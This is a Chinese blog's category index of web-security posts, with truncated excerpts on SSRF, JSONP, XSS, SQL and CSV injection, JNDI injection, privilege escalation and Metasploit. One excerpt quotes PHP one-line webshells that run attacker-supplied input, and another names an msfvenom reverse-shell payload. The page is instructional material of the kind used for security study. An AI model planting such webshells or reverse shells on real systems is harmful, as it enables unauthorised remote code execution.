随笔分类 - 网络安全 / Web安全
摘要:POI解析Excel 先来大致看一下传统poi技术的版本以及优缺点对比吧! 首先我们知道POI中我们最熟悉的莫过于WorkBook这样一个接口,我们的POI版本也在更新的同时对这个几口的实现类做了更新: HSSFWorkbook : 这个实现类是我们早期使用最多的对象,它可以操作Excel2003以
阅读全文
摘要:SSRF 很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。这种形式的攻击称为服务端请求伪造攻击(Server-side Request F
阅读全文
摘要:JSONP 原理 JSONP(JSON with Padding)是JSON的一种“使用模式”,可用于解决主流浏览器的跨域数据访问的问题。下面通过网站A和子站B说明: 网站A:www.AAA.com提供天气信息其接口AAA.com/data.json以json格式返回了天气数据,其分析子站B: an
阅读全文
摘要:@Configuration public class UrlMatchConfig extends WebMvcConfigurationSupport { @Override public void configurePathMatch(PathMatchConfigurer configure
阅读全文
摘要:Metasploit 反弹 shell 利用msfvenom生成一个反弹shell程序 msfvenom -l payloads可以查看所有payload Windows 通用反向 shell: windows/meterpreter/reverse --基于 TCP 的反向链接反弹 shell,使
阅读全文
摘要:Metasploit是一款广泛使用的漏洞评估和渗透测试框架,它可以用于测试网络的安全性,识别漏洞、攻击目标等。本篇教程将介绍如何使用Metasploit进行渗透测试,并对其相关功能进行详细说明。 一、Metasploit简介 Metasploit是一个开源框架,由Rapid7公司开发和维护,旨在帮助
阅读全文
摘要:安全响应头 Cache-control,Pragma,Expires (缓存的安全响应头) 说明:带有敏感数据的Web页面都应该禁止缓存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问 题。特定条件下,即便指定了”Cache-Control:no-cache”头域,浏览器仍会执行缓存动作。建
阅读全文
摘要:SVG中的<use>元素用于重用其他元素,主要用于联接<defs>和alike,而我们却用它来引用外部SVG文件中的元素元素通过其id被引用,在<use>标签的xlink:href属性中以'#'井字符开头,外部元素的引用同样如此基本结构如下所示: test.html <svg> <use xlink
阅读全文
摘要:各种语言的一句话木马 PHP 上传xx.php 内容: 1.<?php @eval($_POST['shell']);?> 2.<?php @eval($_GET['shell']);?> 3.<?php phpinfo();?> 4.<?php readfile('/flag');?>//读取文件
阅读全文
摘要:基础知识 Expect 是 Unix 系统中用来进行自动化控制和测试的软件工具 , 作为 Tcl 脚本语言的一个扩展,应用在交互式软件中 spawn命令启动新的进程来进行交互式的运行,spawn后的send和expect命令都是和spawn打开的进程进行交互的。 send命令接收一个字符串参数,并将
阅读全文
摘要:JasperReport是一个强大、灵活的报表生成工具,能够展示丰富的页面内容,并将之转换成PDF、HTML、XML等格式。该库完全由Java写成,可以用于在各种Java应用程序,包括J2EE,Web应用程序中生成动态内容。JasperReports附带了报表编译器,可以在报表表达式内部使用Groo
阅读全文
摘要:JNDI注入与高版本绕过方式 为了方便大家测试与漏洞排查,为大家总结了快速验证漏洞的各种方式 一、简单利用marshalsec快速搭建JNDI(ldap/rmi)服务 marshalsec是一款java反序列利用工具,其可以很方便的起一个ldap或rmi服务,通过这些服务来去访问攻击者准备好的恶意执
阅读全文
摘要:漏洞介绍 现在很多应用提供了导出电子表格的功能(不限于 Web 应用),导出表格的功能可能会导致注入命令的风险,因为导出的表格数据有很多是来自于用户控制的,如:投票应用、邮箱导出。攻击方式类似于 XSS :所有的输入都是不可信的。利用CSV注入,可以执行任意系统命令,可导致用户数据泄露等风险。 漏洞
阅读全文
摘要:一、常见提权方式 1、普通用户有权修改root用户以root权限执行的脚本文件 普通用户可以修改此文件内容,当root用户执行时,便可执行普通用户注入的命令,实现提权。 如: cron定时任务中执行脚本时,指定了test.sh,test.sh文件如果普通用户有权限进行修改,则存在提权漏洞。 2、系统
阅读全文
摘要:sqlmap sqlmap安装 一款用于sql注入漏洞检测的工具 官网:http://sqlmap.org/ 把压缩包解压,重命名,放在安装的Python根目录下,并且配置环境变量(sqlmap高版本已支持python3,全都下载最新版就行): C:\Python\Python38\sqlmap 打
阅读全文
摘要:跨站脚本(英语:Cross-site scripting,通常简称为:XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script
阅读全文
摘要:正则表达式 常见匹配 ? 通配符匹配文件名中的 0 个或 1 个字符,,表示该匹配单元可以连续存在零个或1个* 通配符匹配零个或多个字符,表示该匹配单元可以连续存在零个或多个,如:[0-9]* 123abcd中有6处匹配,因为在匹配a b c d这些字符时算0个+ 匹配一个或者多个,表示该匹配单元必
阅读全文
摘要:SQL注入测试方式 【有回显SQL注入】 判断注入类型:由于输入的数据 id 是数字,我们并不知道服务器将 id 的值认为是字符还是数字,因此我们需要先来判断是数字型注入还是字符型注入(虽然从源码看得出来)。当输入的参数为字符串时就称该 SQL 注入为字符型,当输入的参数为数字时就称该 SQL 注入
阅读全文
